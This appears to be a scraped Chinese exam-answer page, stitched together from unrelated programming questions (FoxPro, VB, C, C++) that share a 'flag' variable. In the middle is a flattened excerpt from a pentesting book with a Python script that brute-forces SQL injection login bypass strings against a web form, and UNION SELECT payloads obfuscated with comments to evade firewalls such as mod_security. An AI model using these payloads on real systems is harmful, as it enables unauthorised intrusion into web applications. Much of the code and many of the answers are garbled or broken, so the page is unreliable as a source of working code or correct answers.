999kao.com
matplotlib Plotting Cookbook与部分习题参考答案
下列的程序段中与上题的程序段对y的计算结果相同的是 ______。
A.x=34567 y=0 flag=.T. DO WHIL flag y=x% 10+y * 10 x=int(x/10) IF x>0 flag=.F. ENDIF ENDDO
B.x=34567 y=0 flag=.T. DO WHIL flag y=x%10+y * 10 x=int(x/10) IF x=0 flag=.F. ENDIF ENDDO
C.x=34567 y=0 flag=.T. DO WHIL!flag y=x%10+y* 10 x=int(x/10) IF x>0 flag=.F. ENDIF ENDDO
D.x=34567 y=0 flag=.T. DO WHIL!flag y=x%10+y* 10 x=int(x/10) IF x=0 flag=.T. ENDIF ENDDO
解析:此题中选项A运行的结果是7,选项B运行的结果是76543,选项C运行的结果是0,选项D运行的结果是是0。
下列程序用于判断一个整数是否为质数,试将程序补充完整。
Private Sub Command1_Click()
Dim n As Integer
n = InputBox("请输入")
t = Int(Sqr(n))
i = 2
flag = 0
While i <= t And flag = 0
If ______Then
flag = 1
Else: i = i + 1
End If
Wend
If ______Then
Print "这是一个质数"
Else
Print "这不是一个质数"
End If
End Sub
n Mod i=0 , flag=0
假设用户名和口令存储在自由表“口令表”中,当用户输入用户名和口令并单击录”按钮时,若用户名输入错误,则提示“用户名错误”;若用户名输入正确,而口令输入错误,则提示“口令错误”。若命令按钮“登录”的click事件中的代码如 USE 口令表 GO TOP flag=0 DO WHILE.not.EOF0 IF Ailtrim(用户名)=Alltrim(This form.Text1.Value) IF Alltrim(口令)=Alltrim(Thisform.Text2.Value) WA1T"欢迎使用"WIN DOW TIMEOUT2 ELSE WAIT"口令错误" WINDOW TIMEOUT2 ENDIF flag=1 EXIT ENDIF SKIP ENDDO IF______ WAIT"用户名错误"WINDOW TIMEOUT2 ENDIF 则在横线处应填写的代码是
A.flag=-1
B.flag=0
C.flag=1
D.flag=2
解析:从题干中的程序段中可以看出,flag变量起到了标志位的作用,用于标识用户是否正确地输入了用户名。当用户名被正确输入的时候,会将变量flag的值置为1,否则为0。系统初始化时,flag变量的值被设置为0,表示用户名还没有被正确输入,如果用户输入了正确的用户名,程序将继续判断用户输入的密码是否正确,不管密码输入正确与否,程序都会执行到语句flag=1,把变量flag的值设置为1,因此程序可以用flag的值来判断是否用户名被正确输入。最后对flag的值进行判断,如果flag的值为0,就是用户名没有被正确输入的情况。故选项B为正确答案。
阅读以下说明和C语言函数,将应填入(n)处的字句写在答题纸的对应栏内。
[说明]
求树的宽度,所谓宽度是指在二叉树的各层上,具有结点数最多的那一层的结点总数。本算法是按层次遍历二叉树,采用一个队列q,让根结点入队列,若有左右子树,则左右子树根结点入队列,如此反复,直到队列为空。
[函数]
int Width ( BinTree *T
{
int front=-1, rear=-1; /*队列初始化*/
int flag=0, count=0, p; /*p用于指向树中层的最右边的结点, flag 记录层中结点数的最大值*/
if ( T!=Null)
{
rear++;
(1);
flag=1;
p=rear;
}
while ((2))
{
front++;
T=q [front]];
if (T->lchild!=Null )
{
roar+-+;
(3);
count++;
}
if ( T->rchild!=Null )
{
rear++; q[rear]=T->rchild;
(4);
}
if (front==p ) // 当前层已遍历完毕
{
if((5))
flag=count;
count=0;
p=rear, //p 指向下一层最右边的结点
}
}
return ( flag );
}
(1) q [rear]=T (2) frontp (3) q [rear]=T->lchild (4) count++ (5) flagcount
下列的程序 段 中与上题的程序段对 y 的计算结果相同的是
A) x=34567
y=0
flag=.T.
DO WHILE flag
y=x%10+y*10
x=int(x/10)
IF x>0
flag=.F.
ENDIF
ENDDO
B ) x=34567
y=0
flag=.T.
DO WHILE flag
y=x%10+y*10
x=int(x/10) }
IF x=0
flag=.F.
ENDIF
ENDDO
C ) x=34567
y=0
flag=.T.
DO WHILE !flag
y=x%10+y*10
IF x>0
flag=.F.
ENDIF
ENDDO
D) x=34567
y=0
flag=.T.
DO WHILE !flag
y=x%10+y*10
x=int(x/10)
IF x=0
flag=.T.
ENDIF
ENDDO
Chapter 7 145 br.set_handle_robots(False) br.open(url) for form in br.forms(): print form form = raw_input(Enter the form name ) br.select_form(name =form) user_exp = admin -, admin -, admin #, admin # user1 = raw_input(Enter the Username ) pass1 = raw_input(Enter the Password ) flag =0 p =0 while flag =0: br.select_form(name =form) br.formuser1 = user_expp br.formpass1 = aaaaaaaa br.submit() data = for link in br.links(): data=data+str(link) list = logout,logoff, signout,signoff data1 = data.lower() for l in list: for match in re.findall(l,data1): flag = 1 if flag =1: print t Success in ,p+1, attempts print Successfull hit - ,user_expp elif(p+1 = len(user_exp): print All exploits over flag =1 else : p = p+1 In the preceding code, we used one more variable, form; in the output, you have to select the form name. In the sql_form6.py code, I assumed that the username and password are contained in the form number 1. Pentesting of SQLI and XSS 146 The output of the previous code is as follows: The SQL injection username query exploitation Now, we can merge both the sql_form6.py and sql_from7.py code and make one code. In order to mitigate the preceding SQL injection attack, you have to set a ilter program that ilters the input string entered by the user. In PHP, the mysql_real_ escape_string()function is used to ilter. The following screenshot shows how to use this function: The SQL injection filter in PHP Chapter 7 147 So far, you have got the idea of how to carry out a SQL injection attack. In a SQL injection attack, we have to do a lot of things manually, because there are a lot of SQL injection attacks, such as time-based, SQL query-based contained order by, union-based, and so on. Every pentester should know how to craft queries manually. For one type of attack, you can make a program, but now, different website developers use different methods to display data from the database. Some developers use HTML forms to display data, and some use simple HTML statements to display data. A Python tool, sqlmap, can do many things. However, sometimes, a web application irewall, such as mod security, is present; this does not allow queries such as union and order by. In this situation, you have to craft queries manually, as shown here: /*!UNION*/ SELECT 1,2,3,4,5,6,- /*!00000UNION*/ SELECT 1,2,database(),4,5,6 /*!UnIoN*/ /*!sElEcT*/ 1,2,3,4,5,6 You can make a list of crafted queries. When simple queries do not work, you can check the behavior of the website. Based on the behavior, you can decide whether the query is successful or not. In this instance, Python programming is very helpful. Lets now look at the steps to make a Python program for a irewall-based websit、e: 1. Make a list of all the crafted queries. 2. Apply a simple query to a website and observe the response of the website. 3. Use this response for attempt not successful. 4. Apply the listed queries one by one and match the response by program. 5. If the response is not matched, then check the que、ry manually. 6. If it appeared successful, then stop the program. 7. If not successful, then add this in attempt not successful and continue with the listed query. The preceding steps are used to show only whether the crafted query is successful or not. The desired result can be found only by viewing the website. Pentesting of SQLI and XSS 148 Learning about Cross-Site scripting In this section, we will discuss the Cross-Site Scriptin
阅读以下说明和C语言代码,回答问题1至问题4,将解答填入答题纸的对应栏内。
[说明]
有两个任务(编号分别为0和1)需要访问同一个共享资源,为了解决竞争条件(race condition)的问题,需要实现一种互斥机制,使得在任何时刻只能有一个任务访问该共享资源。代码一给出了一种实现方法。
[代码一]
1: int flag[2]; /* flag 数组,初始化为FALSE */
2: Enter_Critical_Section(int my_task_id, int other_task_id)
3: {
4: while (flag[other_task_id] == TRUE); /* 空循环语句 */
5: flag[my_task_id] = TRUE;
6: }
7: Exit_Critical_Section(int my_task_id, int other_task_id)
8: {
9: flag[my_task_id] = FALSE;
10: }
当一个任务要访问临界资源时,就可以调用代码一给出的这两个函数。代码二给出了任务0的一个例子。
[代码二]
Enter_Critical_Section(0,1);
…使用这个资源…
Exit_Critical_Section(0,1);
…做其他事情…
什么是临界资源(critical resource)?请用100字以内文字简要说明。
在多道程序系统中,各进程可以共享各类资源,但有些资源一次只能供一个进程使用。需要互斥访问的资源称为临界资源(critical resource),如打印机、共享变量和表格等。 解析:本题考查的是任务之间的互斥问题,即基于繁忙等待的任务互斥实现方法。在多道程序系统中,各个任务是并发执行的,由于时钟中断的原因,使任务之间的执行顺序变得难以预测,每个任务都有可能在任意一条语句的后面被中断。在这种情形下,如果要采用基于繁忙等待的互斥实现方法,就必须考察所有的可能,即如果每个任务在不同的位置被中断时,能否正确地实现任务间互斥。另外,在这种基于繁忙等待的方法下,每个任务要循环地去判断当前能否访问临界资源,这样会浪费大量的CPU时间,而且如果设计不合理,容易导致死锁。
(11)下列程序用于在带垂直滚动条的文本框Text1中输出3到100之间的全部素数。请填空。 Private Sub Command1_Click() Text1.Text="" For n=3 To 100 k=Int(Sqr(n)) i=2 Flag=0 Do While i<= And Flag=0 If n Mod i=0 Then Flag=1 Else i=i+1 End If Loop If Then Text1.Text=Text1.Text&Str(n)&Chr(13)&Chr(10) End If Next n End Sub
【解析】判断一个数是不是素数,其算法是:从2开始到该数的平方根的下限(即为题中k的值)去除这个数,如果没有可以整除的数则说明该数是个素数。本题中设置了一个标志变量Flag,默认值为0,如果在整除的循环中,检查出该数不是素数,则设置Flag为1,也就是循环后Flag为0的数表示该数是素数,并把它显示在Text1文本框。
#include <iostream>using namespace std;struct student_info{ string name; int chinese; int math; int english;};student_info student[5];void inputinfo(){ int i = 0; char a[20]; for(i = 0;i < 5;i++) { cout<<"enter the "<<i+1<<" student's information "<<endl; cout<<"enter the name"<<endl; cin>>a; student[i].name = a; cout<<"enter chinese performance :"<<endl; cin>>student[i].chinese; cout<<"enter math performance :"<<endl; cin>>student[i].math; cout<<"enter english performance :"<<endl; cin>>student[i].english; }}void outputinfo(){ int i = 0; while(i < 5) { cout<<i+1<<" student's information"<<endl; cout<<student[i].name.c_str()<<endl; cout<<"chinese "<<endl; cout<<student[i].chinese<<endl; cout<<"math "<<endl; cout<<student[i].math<<endl; cout<<"english "<<endl; cout<<student[i].english<<endl; i++; }}int avgfunction(int arr[],int n){ int i = 0; int total = 0; for(i = 0;i < n;i++) { total += arr[i]; } return total / n;}void computavg() //这里是否正确?{ int theavg = 0; theavg = avgfunction(student[i].chinese,5); }int main(){ inputinfo(); outputinfo(); computavg(); cin.get(); return 0;} 帮我找出错误 然后改过来 择优为满意答案 不分先后
A.000000000
B.0123456789
C.Compilationfails.
D.Thecoderunswithnooutput.
E.Thecodeentersaninfiniteloop.
F.Anexceptionisthrownatruntime.
请补充main函数,该函数的功能是:从键盘输入只有两个整数参与运算的一个四则运算式,然后计算出它的值。注意数字全部为正整数。
例如,输入308*28,结果为8624.000000。
注意:部分源程序给出如下。
请勿改动主函数main和其他函数中的任何内容,仅在 main函数的横线上填入所编写的若干表达式或语句。
试题程序:
include<stdio, h>
main ( )
{
int a=0, b=0, flag=l, fg=l;
float result;
char *p, ch;
char str[10];
clrscr ();
printf("\n Input a string \n");
gets (str);
p=str;
while (*p)
{
if (*p>='0' &&*p<='9' && flag==l )
a=【 】;
else
if (fg)
{
ch=*p;
flag=2;
fg=0;
}
if (*p>='0 ' &&*p<='9' &&flag==2)
b=【 】;
p++;
}
switch(【 】)
{
case '+': result=a+b;break;
case '-': result=a-b;break;
case '*' :result=a*b;break;
case '/' :result= (float) a/b;break;
printf ("\nresult=%f", result);
}
a*l0+*p-'0' b*10+*p-'0' ch 解析:第一空:变量a用来保存第一个整数,*p-‘0’得到指针p所指的数字字符的对应数字。第二空:同理,变量b用来保存第二个整数。第三空:字符ch中保存的是四则运算符,而switch语句中case后面的常量表达式都是运算符,所以为了能够匹配,switch后面括号中的表达式应该为ch。